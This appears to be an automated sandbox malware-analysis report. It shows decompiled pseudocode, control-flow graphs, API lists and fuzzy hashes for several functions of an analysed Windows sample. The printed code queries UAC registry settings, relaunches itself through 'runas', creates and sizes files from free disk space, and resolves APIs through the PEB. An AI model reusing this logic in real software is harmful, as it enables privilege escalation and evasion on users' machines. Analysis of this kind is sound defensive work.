                                                                                control_flow_graph 497 409326-409348 call 401910 GetVersionExA 500 409358-40935c 497->500 501 40934a-409356 497->501 502 409360-40937d GetModuleHandleA GetModuleFileNameA 500->502 501->502 503 409385-4093a2 502->503 504 40937f 502->504 505 4093a4-4093d7 call 402544 wsprintfA 503->505 506 4093d9-409412 call 402544 wsprintfA 503->506 504->503 511 409415-40942c call 40ee2a 505->511 506->511 514 4094a3-4094b3 call 406edd 511->514 515 40942e-409432 511->515 521 4094b9-4094f9 call 402544 RegOpenKeyExA 514->521 522 40962f-409632 514->522 515->514 517 409434-4094a0 call 406cc9 call 40ef00 call 402544 call 40ef1e call 402544 wsprintfA call 40ee2a 515->517 517->514 530 409502-40952e call 402544 RegQueryValueExA 521->530 531 4094fb-409500 521->531 524 409634-409637 522->524 528 409639-40964a call 401820 524->528 529 40967b-409682 524->529 540 40964c-409662 528->540 541 40966d-409679 528->541 533 409683 call 4091eb 529->533 549 409530-409537 530->549 550 409539-409565 call 402544 RegQueryValueExA 530->550 536 40957a-40957f 531->536 544 409688-409690 533->544 545 409581-409584 536->545 546 40958a-40958d 536->546 547 409664-40966b 540->547 548 40962b-40962d 540->548 541->533 552 409692 544->552 553 409698-4096a0 544->553 545->524 545->546 546->529 554 409593-40959a 546->554 547->548 558 4096a2-4096a9 548->558 555 40956e-409577 RegCloseKey 549->555 550->555 566 409567 550->566 552->553 553->558 559 40961a-40961f 554->559 560 40959c-4095a1 554->560 555->536 564 409625 559->564 560->559 561 4095a3-4095c0 call 40f0e4 560->561 570 4095c2-4095db call 4018e0 561->570 571 40960c-409618 561->571 564->548 566->555 570->558 574 4095e1-4095f9 570->574 571->564 574->558 575 4095ff-409607 574->575 575->558
                                                                                C-Code - Quality: 77%
                                                                                			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				long _t107;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161); // executed
						L39:
						_t96 = E004091EB(); // executed
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x61040000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				_t107 = RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50); // executed
				if(_t107 == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c); // executed
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c); // executed
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x61040106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x61040107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x61040000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}





























                                                                                0x00409326
                                                                                0x00409327
                                                                                0x00409330
                                                                                0x00409339
                                                                                0x00409348
                                                                                0x00409358
                                                                                0x0040935c
                                                                                0x0040935c
                                                                                0x0040935c
                                                                                0x0040934a
                                                                                0x00409353
                                                                                0x00409353
                                                                                0x00409375
                                                                                0x0040937d
                                                                                0x0040937f
                                                                                0x0040937f
                                                                                0x0040938c
                                                                                0x00409394
                                                                                0x004093a2
                                                                                0x004093d9
                                                                                0x004093dc
                                                                                0x004093dd
                                                                                0x004093e0
                                                                                0x004093e3
                                                                                0x004093e6
                                                                                0x004093e9
                                                                                0x004093ec
                                                                                0x0040940c
                                                                                0x00409412
                                                                                0x004093a4
                                                                                0x004093a4
                                                                                0x004093a5
                                                                                0x004093a8
                                                                                0x004093ab
                                                                                0x004093ae
                                                                                0x004093b1
                                                                                0x004093ce
                                                                                0x004093d4
                                                                                0x004093d4
                                                                                0x0040941d
                                                                                0x00409420
                                                                                0x00409425
                                                                                0x0040942c
                                                                                0x00409441
                                                                                0x0040945d
                                                                                0x0040946b
                                                                                0x0040948d
                                                                                0x0040949b
                                                                                0x004094a0
                                                                                0x004094a0
                                                                                0x004094a3
                                                                                0x004094b0
                                                                                0x004094b3
                                                                                0x0040962f
                                                                                0x00409632
                                                                                0x00409632
                                                                                0x00409634
                                                                                0x00409634
                                                                                0x00409637
                                                                                0x0040967b
                                                                                0x00409681
                                                                                0x00409682
                                                                                0x00409683
                                                                                0x00409683
                                                                                0x0040968a
                                                                                0x00409690
                                                                                0x00409692
                                                                                0x00409692
                                                                                0x00409692
                                                                                0x0040969a
                                                                                0x0040969d
                                                                                0x0040969d
                                                                                0x004096a0
                                                                                0x004096a2
                                                                                0x004096a9
                                                                                0x004096a9
                                                                                0x00409641
                                                                                0x00409648
                                                                                0x0040964a
                                                                                0x00409673
                                                                                0x00409674
                                                                                0x00000000
                                                                                0x00409674
                                                                                0x00409652
                                                                                0x00409652
                                                                                0x00409657
                                                                                0x0040965c
                                                                                0x00409662
                                                                                0x00409666
                                                                                0x00409666
                                                                                0x0040962b
                                                                                0x0040962b
                                                                                0x00000000
                                                                                0x0040962b
                                                                                0x004094ce
                                                                                0x004094d5
                                                                                0x004094dc
                                                                                0x004094e3
                                                                                0x004094e8
                                                                                0x004094f1
                                                                                0x004094f9
                                                                                0x0040951a
                                                                                0x0040951f
                                                                                0x00409526
                                                                                0x0040952c
                                                                                0x0040952e
                                                                                0x00409551
                                                                                0x00409556
                                                                                0x0040955d
                                                                                0x00409563
                                                                                0x00409565
                                                                                0x00409567
                                                                                0x00409567
                                                                                0x00409530
                                                                                0x00409530
                                                                                0x00409530
                                                                                0x00409571
                                                                                0x00409577
                                                                                0x004094fb
                                                                                0x004094fb
                                                                                0x004094fb
                                                                                0x0040957a
                                                                                0x0040957f
                                                                                0x0040958d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409597
                                                                                0x0040959a
                                                                                0x0040961a
                                                                                0x0040961f
                                                                                0x0040961f
                                                                                0x00000000
                                                                                0x004095a3
                                                                                0x004095c0
                                                                                0x0040960c
                                                                                0x00409612
                                                                                0x00409625
                                                                                0x00409625
                                                                                0x00000000
                                                                                0x00409625
                                                                                0x004095d1
                                                                                0x004095db
                                                                                0x004095e7
                                                                                0x004095ed
                                                                                0x004095f3
                                                                                0x004095f9
                                                                                0x00409601
                                                                                0x00409601
                                                                                0x004095f9
                                                                                0x00000000
                                                                                0x004095db
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                • wsprintfA.USER32 ref: 004093CE
                                                                                • wsprintfA.USER32 ref: 0040940C
                                                                                • wsprintfA.USER32 ref: 0040948D
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: PromptOnSecureDesktop$runas
                                                                                • API String ID: 3696105349-2220793183
                                                                                • Opcode ID: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction ID: 03442aab56affe776738d217652d29bf499ebc974a67126763565949ba301525
                                                                                • Opcode Fuzzy Hash: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction Fuzzy Hash: 53A171B2540208BBEB21DFA1CC45FDF3BACAB44344F104437FA05E6192D7B999848FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406A60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 614 406a60-406a89 CreateFileA 615 406b8c-406ba1 GetLastError 614->615 616 406a8f-406ac3 GetDiskFreeSpaceA 614->616 619 406ba3-406ba6 615->619 617 406ac5-406adc call 40eb0e 616->617 618 406b1d-406b34 call 406987 616->618 617->618 626 406ade 617->626 624 406b56-406b63 FindCloseChangeNotification 618->624 625 406b36-406b54 GetLastError CloseHandle 618->625 628 406b65-406b7d GetLastError CloseHandle 624->628 629 406b86-406b8a 624->629 627 406b7f-406b80 DeleteFileA 625->627 630 406ae0-406ae5 626->630 631 406ae7-406afb call 40eca5 626->631 627->629 628->627 629->619 630->631 632 406afd-406aff 630->632 631->618 632->618 634 406b01 632->634 636 406b03-406b08 634->636 637 406b0a-406b17 call 40eca5 634->637 636->618 636->637 637->618
                                                                                C-Code - Quality: 100%
                                                                                			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				int _t42;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x61040101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				_t42 = GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32); // executed
				if(_t42 == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63); // executed
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = FindCloseChangeNotification(_v12); // executed
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x61040103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x61040102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}






















                                                                                0x00406a60
                                                                                0x00406a68
                                                                                0x00406a7d
                                                                                0x00406a83
                                                                                0x00406a89
                                                                                0x00406b8c
                                                                                0x00406b9c
                                                                                0x00406ba1
                                                                                0x00000000
                                                                                0x00406ba1
                                                                                0x00406a91
                                                                                0x00406a97
                                                                                0x00406a9e
                                                                                0x00406aa1
                                                                                0x00406ab8
                                                                                0x00406abb
                                                                                0x00406ac3
                                                                                0x00406b1d
                                                                                0x00406b27
                                                                                0x00406b2f
                                                                                0x00406b34
                                                                                0x00406b5f
                                                                                0x00406b61
                                                                                0x00406b63
                                                                                0x00406b86
                                                                                0x00000000
                                                                                0x00406b89
                                                                                0x00406b65
                                                                                0x00406b78
                                                                                0x00406b7d
                                                                                0x00406b7f
                                                                                0x00406b80
                                                                                0x00000000
                                                                                0x00406b80
                                                                                0x00406b36
                                                                                0x00406b49
                                                                                0x00406b4e
                                                                                0x00000000
                                                                                0x00406b4e
                                                                                0x00406ad2
                                                                                0x00406ad7
                                                                                0x00406ada
                                                                                0x00406adc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ade
                                                                                0x00406af5
                                                                                0x00406af5
                                                                                0x00000000
                                                                                0x00406afd
                                                                                0x00406afd
                                                                                0x00406aff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b01
                                                                                0x00406b0a
                                                                                0x00406b17
                                                                                0x00406b17
                                                                                0x00000000
                                                                                0x00406b17
                                                                                0x00406b03
                                                                                0x00406b08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b08

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                • GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1251348514-2980165447
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: 425ce4a4a5363573a79131118f251082e1da2794364dd09a1208fe8084ee845e
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: C731E0B2900108BFDB00DFA09D44ADF7F78AF48310F158076E112F7291D674A9608F69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EC54 Relevance: 4.5, APIs: 3, Instructions: 24timeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 100%
                                                                                			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}






                                                                                0x0040ec5e
                                                                                0x0040ec72
                                                                                0x0040ec84
                                                                                0x0040ec89
                                                                                0x0040ec8f

                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$CountFileInformationSystemTickVolume
                                                                                • String ID:
                                                                                • API String ID: 1209300637-0
                                                                                • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 769 208092b-2080970 GetPEB 770 2080972-2080978 769->770 771 208097a-208098a call 2080d35 770->771 772 208098c-208098e 770->772 771->772 777 2080992-2080994 771->777 772->770 774 2080990 772->774 776 2080996-2080998 774->776 778 2080a3b-2080a3e 776->778 777->776 779 208099d-20809d3 777->779 780 20809dc-20809ee call 2080d0c 779->780 783 20809f0-2080a3a 780->783 784 20809d5-20809d8 780->784 783->778 784->780
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: 761247b40084aa777b878560d26c120f0ea522af0afc58718300f8bafaa69f72
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: F5313BB6910709DFDB11DF99C880AAEBBF6FF48324F15405AD881A7310D771EA49CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007B9EA4 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 840 7b9ea4-7b9ebd 841 7b9ebf-7b9ec1 840->841 842 7b9ec8-7b9ed4 CreateToolhelp32Snapshot 841->842 843 7b9ec3 841->843 844 7b9ed6-7b9edc 842->844 845 7b9ee4-7b9ef1 Module32First 842->845 843->842 844->845 850 7b9ede-7b9ee2 844->850 846 7b9efa-7b9f02 845->846 847 7b9ef3-7b9ef4 call 7b9b63 845->847 851 7b9ef9 847->851 850->841 850->845 851->846
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007B9ECC
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 007B9EEC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B6000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7b6000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 7ed9fa93bfeb395ccc1d49839d94359ed700d51ed9063b94cd4428a3babcc52c
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 26F062335007116BD720BBF5A88DBAB76E8AF49725F100529E763954C0EB78EC458661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EBCC Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0040EB74(_t7);
				return _t7;
			}





                                                                                0x0040ebda
                                                                                0x0040ebe0
                                                                                0x0040ebe3
                                                                                0x0040ebec

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                  • Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
                                                                                  • Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocateSize
                                                                                • String ID:
                                                                                • API String ID: 2559512979-0
                                                                                • Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                • Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
                                                                                • Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                • Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004073FF Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
